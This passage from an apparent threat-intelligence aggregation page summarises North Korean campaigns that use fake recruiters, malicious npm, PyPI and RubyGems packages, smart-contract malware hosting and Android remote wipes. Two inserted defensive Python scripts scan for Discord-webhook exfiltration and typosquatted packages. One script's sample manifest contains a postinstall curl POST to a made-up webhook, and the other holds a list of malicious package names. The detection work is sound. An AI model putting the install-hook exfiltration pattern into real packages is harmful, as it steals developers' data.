- North Korea’s Fake Recruiters Feed Stolen Data to IT Workers — www.securityweek.com — 26.09.2025 15:01
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
AkdoorTea is a remote access trojan delivered by a Windows batch script, sharing commonalities with Akdoor and NukeSped (Manuscrypt).
First reported: 25.09.2025 16:14 · 3 sources, 4 articles. Sources:
- North Korean Hackers Use New AkdoorTea Backdoor to Target Global Crypto Developers — thehackernews.com — 25.09.2025 16:14
- North Korea’s Fake Recruiters Feed Stolen Data to IT Workers — www.securityweek.com — 26.09.2025 15:01
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
The DeceptiveDevelopment campaign targets developers associated with cryptocurrency and decentralized finance projects with fake job offers aimed at information theft and malware infection.
First reported: 26.09.2025 15:01 · 3 sources, 4 articles. Sources:
- North Korea’s Fake Recruiters Feed Stolen Data to IT Workers — www.securityweek.com — 26.09.2025 15:01
- npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels — thehackernews.com — 14.10.2025 10:09
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
The DeceptiveDevelopment campaign supplies stolen developer information to North Korea’s fraudulent IT workers, who use it to pose as job seekers and land remote work at unsuspecting companies.
First reported: 26.09.2025 15:01 · 3 sources, 4 articles. Sources:
- North Korea’s Fake Recruiters Feed Stolen Data to IT Workers — www.securityweek.com — 26.09.2025 15:01
- npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels — thehackernews.com — 14.10.2025 10:09
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The DeceptiveDevelopment campaign involves tight collaboration with North Korea’s network of fraudulent IT workers, tracked as WageMole.
First reported: 26.09.2025 15:01 · 3 sources, 4 articles
- North Korea’s Fake Recruiters Feed Stolen Data to IT Workers — www.securityweek.com — 26.09.2025 15:01
- npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels — thehackernews.com — 14.10.2025 10:09
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The North Korean IT workers operate in teams, focusing on obtaining work in Western countries, particularly the US, and in Europe, targeting France, Poland, Ukraine, and Albania.
First reported: 26.09.2025 15:01 · 3 sources, 3 articles
- North Korea’s Fake Recruiters Feed Stolen Data to IT Workers — www.securityweek.com — 26.09.2025 15:01
- npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels — thehackernews.com — 14.10.2025 10:09
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- The North Korean IT workers impersonate real companies and engineers, producing engineering drawings with falsified approval stamps, and focus on self-education in web programming, blockchain, English, and AI integration.
First reported: 26.09.2025 15:01 · 3 sources, 4 articles
- North Korea’s Fake Recruiters Feed Stolen Data to IT Workers — www.securityweek.com — 26.09.2025 15:01
- npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels — thehackernews.com — 14.10.2025 10:09
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The Contagious Interview campaign has expanded to include malicious packages in the npm, PyPI, and RubyGems ecosystems.
First reported: 14.10.2025 10:09 · 3 sources, 4 articles
- npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels — thehackernews.com — 14.10.2025 10:09
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The campaign uses Discord webhooks as a command-and-control (C2) channel to exfiltrate data.
First reported: 14.10.2025 10:09 · 3 sources, 4 articles
- npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels — thehackernews.com — 14.10.2025 10:09
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
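The Discord-webhook exfiltration channel described above is something a defender can hunt for in freshly installed dependencies, because a webhook URL has a fixed, recognisable shape. The Python below is an added example written for this page, not code from any of the cited reports: it flags Discord webhook URLs in npm lifecycle scripts (which run automatically during `npm install`) and in source files of an installed tree. The sample manifest, its webhook id and its token are constructed, and the helper names are this example's own.

```python
"""Flag dependencies whose install hooks or source files reference a Discord webhook."""
import json
import re
from pathlib import Path

# A Discord webhook URL always has this shape: /api/webhooks/<numeric id>/<token>.
WEBHOOK_RE = re.compile(
    r"https?://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[\w-]+"
)
# npm lifecycle scripts that run automatically during `npm install`.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")


def find_webhooks(text: str) -> list[str]:
    """Return the distinct Discord webhook URLs found in text, in order of appearance."""
    found: list[str] = []
    for match in WEBHOOK_RE.finditer(text):
        if match.group(0) not in found:
            found.append(match.group(0))
    return found


def audit_manifest(manifest: dict) -> list[str]:
    """Report lifecycle hooks in a parsed package.json that reference a webhook."""
    name = manifest.get("name", "<unnamed>")
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in LIFECYCLE_HOOKS:
        for url in find_webhooks(str(scripts.get(hook, ""))):
            findings.append(f"{name}: '{hook}' script references {url}")
    return findings


def audit_tree(root: Path, suffixes=(".js", ".mjs", ".py", ".rb")) -> list[str]:
    """Walk an installed dependency tree (node_modules, site-packages, a gem
    directory) and report every package.json hook and source file embedding a webhook."""
    findings = []
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        if path.name == "package.json":
            try:
                findings += audit_manifest(json.loads(path.read_text(encoding="utf-8")))
            except (json.JSONDecodeError, UnicodeDecodeError):
                continue
        elif path.suffix in suffixes:
            text = path.read_text(encoding="utf-8", errors="replace")
            findings += [f"{path}: references {url}" for url in find_webhooks(text)]
    return findings


# Constructed sample manifest; the webhook id and token are made up.
SAMPLE_MANIFEST = {
    "name": "example-dumper",
    "version": "1.0.0",
    "scripts": {
        "postinstall": "curl -s -X POST https://discord.com/api/webhooks/1234567890/constructed-token-xyz"
    },
}

if __name__ == "__main__":
    for line in audit_manifest(SAMPLE_MANIFEST):
        print(line)
```

Run `audit_tree(Path("node_modules"))` after an install to review a whole tree; a webhook in a lifecycle hook is a far stronger signal than one in library code, since nothing legitimate needs to post to Discord while installing.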
- The malicious packages include mysql-dumpdiscord (npm), nodejs.discord (npm), malinssx, malicus, and maliinn (PyPI), and sqlcommenter_rails (RubyGems.org).
First reported: 14.10.2025 10:09 · 3 sources, 4 articles
- npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels — thehackernews.com — 14.10.2025 10:09
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The campaign has published 338 malicious packages, downloaded over 50,000 times, using more than 180 fake personas and over a dozen C2 endpoints.
First reported: 14.10.2025 10:09 · 3 sources, 4 articles
- npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels — thehackernews.com — 14.10.2025 10:09
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The campaign targets Web3, cryptocurrency, and blockchain developers, as well as job seekers in the technical sector.
First reported: 14.10.2025 10:09 · 3 sources, 4 articles
- npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels — thehackernews.com — 14.10.2025 10:09
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The malware families delivered include HexEval, XORIndex, encrypted loaders, BeaverTail, and InvisibleFerret.
First reported: 14.10.2025 10:09 · 3 sources, 4 articles
- npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels — thehackernews.com — 14.10.2025 10:09
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The campaign involves typosquatting and lookalike libraries to deceive developers.
First reported: 14.10.2025 10:09 · 3 sources, 4 articles
- npm, PyPI, and RubyGems Packages Found Sending Developer Data to Discord Channels — thehackernews.com — 14.10.2025 10:09
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
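Two of the entries above, the named malicious packages and the use of typosquatted lookalike names, lend themselves to one manifest check. The Python below is an added example for this page, not code from the cited reports: it reads package names out of a requirements.txt, a Gemfile or a parsed package.json, matches them against the package names listed on this page, and flags names that are close to, but not the same as, a known-good package. The popular-package allowlist is a constructed sample that a real deployment would replace with its own approved dependencies; the parser and function names are this example's own.

```python
"""Check dependency manifests against the package names reported on this page
and flag lookalike names close to well-known packages."""
import re
from difflib import SequenceMatcher

# Package names listed in the reporting above, keyed by ecosystem.
KNOWN_MALICIOUS = {
    "npm": {"mysql-dumpdiscord", "nodejs.discord"},
    "pypi": {"malinssx", "malicus", "maliinn"},
    "rubygems": {"sqlcommenter_rails"},
}

# Constructed sample of legitimate, widely used packages; substitute your own
# allowlist of approved dependencies in a real deployment.
POPULAR = {
    "npm": {"discord.js", "express", "lodash", "axios"},
    "pypi": {"requests", "numpy", "pandas"},
    "rubygems": {"rails", "rack", "nokogiri"},
}


def normalize(name: str) -> str:
    """Fold case and treat '-', '_' and '.' as one separator, so that
    separator swaps (a common squatting trick on npm) compare as near-identical."""
    return re.sub(r"[-_.]+", "-", name.strip().lower())


def lookalike_of(name: str, ecosystem: str, threshold: float = 0.8):
    """Return the popular package this name most resembles, or None if the name
    is exactly an allowed package or is not close to any of them."""
    raw = name.strip().lower()
    if raw in {p.lower() for p in POPULAR[ecosystem]}:
        return None
    folded = normalize(name)
    best, best_ratio = None, 0.0
    for popular in POPULAR[ecosystem]:
        ratio = SequenceMatcher(None, folded, normalize(popular)).ratio()
        if ratio >= threshold and ratio > best_ratio:
            best, best_ratio = popular, ratio
    return best


def check_dependencies(ecosystem: str, names) -> list[str]:
    """Return one finding per dependency that is a listed IoC or a lookalike."""
    bad = {normalize(m) for m in KNOWN_MALICIOUS[ecosystem]}
    findings = []
    for name in names:
        if normalize(name) in bad:
            findings.append(f"{ecosystem}:{name} is a package named in the reporting")
        else:
            near = lookalike_of(name, ecosystem)
            if near:
                findings.append(f"{ecosystem}:{name} looks like {near}")
    return findings


def parse_requirements(text: str) -> list[str]:
    """Package names from a requirements.txt, with version specifiers, extras,
    environment markers, comments and option lines (-r, -e, ...) stripped."""
    names = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue
        names.append(re.split(r"[\s\[=<>!~;@]", line, maxsplit=1)[0])
    return names


def parse_gemfile(text: str) -> list[str]:
    """Gem names from `gem "name", ...` lines in a Gemfile."""
    return re.findall(r"^\s*gem\s+['\"]([^'\"]+)['\"]", text, re.MULTILINE)


def manifest_names(manifest: dict) -> list[str]:
    """Dependency names from a parsed package.json."""
    deps = {}
    for key in ("dependencies", "devDependencies", "optionalDependencies"):
        deps.update(manifest.get(key) or {})
    return list(deps)


if __name__ == "__main__":
    # Constructed sample inputs.
    print(check_dependencies("npm", ["express", "mysql-dumpdiscord", "discordjs"]))
    print(check_dependencies("pypi", parse_requirements("requests==2.31.0\nmalicus\nrequets\n")))
```

The similarity threshold is deliberately loose; on PyPI, where `-`, `_` and `.` already map to the same project, a separator-only difference is a false positive, while on npm it is exactly the squat the check exists to catch, so tune the threshold per ecosystem rather than globally.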
- North Korean hackers have adopted the 'EtherHiding' technique that leverages smart contracts to host and deliver malware in social engineering campaigns that steal cryptocurrency.
First reported: 16.10.2025 17:00 · 3 sources, 4 articles
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- North Korean hackers exploit React2Shell flaw in EtherRAT malware attacks — www.bleepingcomputer.com — 09.12.2025 17:43
- A DPRK nation-state threat actor, tracked internally as UNC5342, has been employing EtherHiding since February in Contagious Interview operations.
First reported: 16.10.2025 17:00 · 3 sources, 4 articles
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- North Korean hackers exploit React2Shell flaw in EtherRAT malware attacks — www.bleepingcomputer.com — 09.12.2025 17:43
- EtherHiding is a malware distribution technique where payloads are embedded within smart contracts on a public blockchain (Binance Smart Chain or Ethereum).
First reported: 16.10.2025 17:00 · 3 sources, 4 articles
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- North Korean hackers exploit React2Shell flaw in EtherRAT malware attacks — www.bleepingcomputer.com — 09.12.2025 17:43
- The smart contract hosts the JADESNOW downloader that interacts with Ethereum to fetch the third-stage payload, which is a JavaScript version of the InvisibleFerret malware.
First reported: 16.10.2025 17:00 · 3 sources, 3 articles
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The payload runs in memory and may ask Ethereum for an additional component that steals credentials.
First reported: 16.10.2025 17:00 · 3 sources, 4 articles
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- North Korean hackers exploit React2Shell flaw in EtherRAT malware attacks — www.bleepingcomputer.com — 09.12.2025 17:43
- The hackers can use JADESNOW to retrieve a payload from either Ethereum or the BNB Smart Chain, making analysis more difficult.
First reported: 16.10.2025 17:00 · 3 sources, 4 articles
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- North Korean hackers exploit React2Shell flaw in EtherRAT malware attacks — www.bleepingcomputer.com — 09.12.2025 17:43
- The transaction details show that the contract has been updated over 20 times within the first four months, with each update costing an average of $1.37 USD in gas fees.
First reported: 16.10.2025 17:00 · 3 sources, 3 articles
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The credential stealer component targets passwords, credit cards, and cryptocurrency wallet (MetaMask and Phantom) information stored in web browsers like Chrome and Edge.
First reported: 16.10.2025 17:00 · 3 sources, 3 articles
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The malware runs in the background and listens for incoming commands from its command-and-control (C2) server, such as executing arbitrary commands and exfiltrating files in ZIP form to an external server or Telegram.
First reported: 16.10.2025 17:00 · 3 sources, 3 articles
- North Korean hackers use EtherHiding to hide malware on the blockchain — www.bleepingcomputer.com — 16.10.2025 17:00
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The technique of EtherHiding was first described by Guardio Labs in 2023.
First reported: 17.10.2025 16:14 · 2 sources, 2 articles
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The EtherHiding technique is resilient to conventional takedown and blocklisting efforts.
First reported: 17.10.2025 16:14 · 3 sources, 3 articles
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- North Korean hackers exploit React2Shell flaw in EtherRAT malware attacks — www.bleepingcomputer.com — 09.12.2025 17:43
- The identity of an attacker using EtherHiding is difficult to trace due to the pseudonymous nature of blockchain transactions.
First reported: 17.10.2025 16:14 · 2 sources, 2 articles
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- EtherHiding represents a shift towards next-generation bulletproof hosting where the inherent features of blockchain technology are used for malicious purposes.
First reported: 17.10.2025 16:14 · 3 sources, 3 articles
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- North Korean hackers exploit React2Shell flaw in EtherRAT malware attacks — www.bleepingcomputer.com — 09.12.2025 17:43
- The Contagious Interview campaign employs a multi-stage malware infection process involving JADESNOW, BEAVERTAIL, and INVISIBLEFERRET.
First reported: 17.10.2025 16:14 · 2 sources, 2 articles
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The Contagious Interview campaign targets developers in the cryptocurrency and technology sectors to steal sensitive data and cryptocurrency and to gain persistent access to corporate networks.
First reported: 17.10.2025 16:14 · 3 sources, 3 articles
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- North Korean hackers exploit React2Shell flaw in EtherRAT malware attacks — www.bleepingcomputer.com — 09.12.2025 17:43
- The Contagious Interview campaign uses elaborate social engineering tactics that mimic legitimate recruitment processes through fake recruiters and fabricated companies.
First reported: 17.10.2025 16:14 · 2 sources, 2 articles
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- Fake recruiters lure candidates onto platforms like Telegram or Discord, then deliver malware through deceptive coding tests or fake software downloads disguised as technical assessments or interview fixes.
First reported: 17.10.2025 16:14 · 2 sources, 2 articles
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The Contagious Interview campaign affects Windows, macOS, and Linux systems.
First reported: 17.10.2025 16:14 · 2 sources, 2 articles
- North Korean Hackers Use EtherHiding to Steal Crypto — www.infosecurity-magazine.com — 17.10.2025 16:14
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The GhostCall and GhostHire campaigns are part of a broader operation called SnatchCrypto, attributed to the BlueNoroff subgroup of the Lazarus Group.
First reported: 28.10.2025 18:12 · 1 source, 1 article
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The GhostCall campaign targets executives at tech companies and in the venture capital sector, using fake Zoom calls to lure victims into downloading malicious payloads.
First reported: 28.10.2025 18:12 · 1 source, 1 article
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The GhostHire campaign targets Web3 developers, using fake job offers on Telegram to lure victims into executing malicious code.
First reported: 28.10.2025 18:12 · 1 source, 1 article
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The GhostCall campaign uses fake Zoom and Microsoft Teams pages to trick victims into downloading malicious software.
First reported: 28.10.2025 18:12 · 1 source, 1 article
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The GhostHire campaign uses a Telegram bot to send victims a coding assessment project that contains a malicious dependency.
First reported: 28.10.2025 18:12 · 1 source, 1 article
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The campaigns use a variety of malware families, including CosmicDoor, RooTroy, RealTimeTroy, SneakMain, and SilentSiphon.
First reported: 28.10.2025 18:12 · 1 source, 1 article
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The malware families used in these campaigns are designed to exfiltrate data from a wide range of services, including GitHub, GitLab, and various cloud services.
First reported: 28.10.2025 18:12 · 1 source, 1 article
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- The GhostCall and GhostHire campaigns have been active since mid-2023, with the GhostCall campaign targeting macOS devices and the GhostHire campaign targeting both Windows and macOS systems.
First reported: 28.10.2025 18:12 · 1 source, 1 article
- Researchers Expose GhostCall and GhostHire: BlueNoroff's New Malware Chains — thehackernews.com — 28.10.2025 18:12
- Konni (aka Earth Imp, Opal Sleet, Osmium, TA406, and Vedalia) is a North Korea-affiliated threat actor.
First reported: 10.11.2025 22:29 · 2 sources, 2 articles
- Konni Hackers Turn Google’s Find Hub into a Remote Data-Wiping Weapon — thehackernews.com — 10.11.2025 22:29
- APT37 hackers abuse Google Find Hub in Android data-wiping attacks — www.bleepingcomputer.com — 11.11.2025 02:46
- Konni has been attributed to attacks targeting both Android and Windows devices for data theft and remote control.
First reported: 10.11.2025 22:29 · 3 sources, 3 articles
- Konni Hackers Turn Google’s Find Hub into a Remote Data-Wiping Weapon — thehackernews.com — 10.11.2025 22:29
- APT37 hackers abuse Google Find Hub in Android data-wiping attacks — www.bleepingcomputer.com — 11.11.2025 02:46
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45
- Konni impersonates psychological counselors and North Korean human rights activists, distributing malware disguised as stress-relief programs.
First reported: 10.11.2025 22:29 · 2 sources, 2 articles
- Konni Hackers Turn Google’s Find Hub into a Remote Data-Wiping Weapon — thehackernews.com — 10.11.2025 22:29
- APT37 hackers abuse Google Find Hub in Android data-wiping attacks — www.bleepingcomputer.com — 11.11.2025 02:46
- Konni exploits Google's Find Hub (formerly Find My Device) to remotely reset victim devices, leading to unauthorized deletion of personal data.
First reported: 10.11.2025 22:29 · 4 sources, 4 articles
- Konni Hackers Turn Google’s Find Hub into a Remote Data-Wiping Weapon — thehackernews.com — 10.11.2025 22:29
- APT37 hackers abuse Google Find Hub in Android data-wiping attacks — www.bleepingcomputer.com — 11.11.2025 02:46
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45
- Konni uses spear-phishing emails mimicking legitimate entities like the National Tax Service to deliver remote access trojans like Lilith RAT.
First reported: 10.11.2025 22:29 · 4 sources, 4 articles
- Konni Hackers Turn Google’s Find Hub into a Remote Data-Wiping Weapon — thehackernews.com — 10.11.2025 22:29
- APT37 hackers abuse Google Find Hub in Android data-wiping attacks — www.bleepingcomputer.com — 11.11.2025 02:46
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45
- Konni deploys malware that allows internal reconnaissance, monitoring, and exfiltration of Google and Naver account credentials.
First reported: 10.11.2025 22:29 · 4 sources, 4 articles
- Konni Hackers Turn Google’s Find Hub into a Remote Data-Wiping Weapon — thehackernews.com — 10.11.2025 22:29
- APT37 hackers abuse Google Find Hub in Android data-wiping attacks — www.bleepingcomputer.com — 11.11.2025 02:46
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45
- Konni uses a malicious Microsoft Installer (MSI) package signed with a valid signature from a Chinese company to give the application an illusion of legitimacy.
First reported: 10.11.2025 22:29 · 4 sources, 4 articles
- Konni Hackers Turn Google’s Find Hub into a Remote Data-Wiping Weapon — thehackernews.com — 10.11.2025 22:29
- APT37 hackers abuse Google Find Hub in Android data-wiping attacks — www.bleepingcomputer.com — 11.11.2025 02:46
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45
- Konni uses an AutoIt script to launch Remcos RAT version 7.0.4, indicating active use of newer versions of the trojan.
First reported: 10.11.2025 22:29 · 4 sources, 4 articles
- Konni Hackers Turn Google’s Find Hub into a Remote Data-Wiping Weapon — thehackernews.com — 10.11.2025 22:29
- APT37 hackers abuse Google Find Hub in Android data-wiping attacks — www.bleepingcomputer.com — 11.11.2025 02:46
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- Android Devices Targeted By KONNI APT in Find Hub Exploitation — www.infosecurity-magazine.com — 11.11.2025 18:45
- Konni has been found to use Quasar RAT and RftRAT, previously used by Kimsuky in 2023.
First reported: 10.11.2025 22:29 · 3 sources, 3 articles
- Konni Hackers Turn Google’s Find Hub into a Remote Data-Wiping Weapon — thehackernews.com — 10.11.2025 22:29
- APT37 hackers abuse Google Find Hub in Android data-wiping attacks — www.bleepingcomputer.com — 11.11.2025 02:46
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- Lazarus Group has used an updated version of the Comebacker malware in attacks aimed at aerospace and defense organizations.
First reported: 10.11.2025 22:29 · 1 source, 1 article
- Konni Hackers Turn Google’s Find Hub into a Remote Data-Wiping Weapon — thehackernews.com — 10.11.2025 22:29
- Kimsuky has employed a new JavaScript-based malware dropper in its recent operations.
First reported: 10.11.2025 22:29 · 1 source, 1 article
- Konni Hackers Turn Google’s Find Hub into a Remote Data-Wiping Weapon — thehackernews.com — 10.11.2025 22:29
- The KONNI campaign abuses Google Find Hub to track GPS locations of targets and remotely reset Android devices to factory settings, primarily targeting South Koreans via the KakaoTalk messenger.
First reported: 11.11.2025 02:46 · 2 sources, 2 articles
- APT37 hackers abuse Google Find Hub in Android data-wiping attacks — www.bleepingcomputer.com — 11.11.2025 02:46
- Kimsuky APT Takes Over South Korean Androids, Abuses KakaoTalk — www.darkreading.com — 11.11.2025 13:40
- The remote wipe of Android devices is timed for when victims are outside, to delay response and recovery, and is executed multiple times to prevent device reuse.
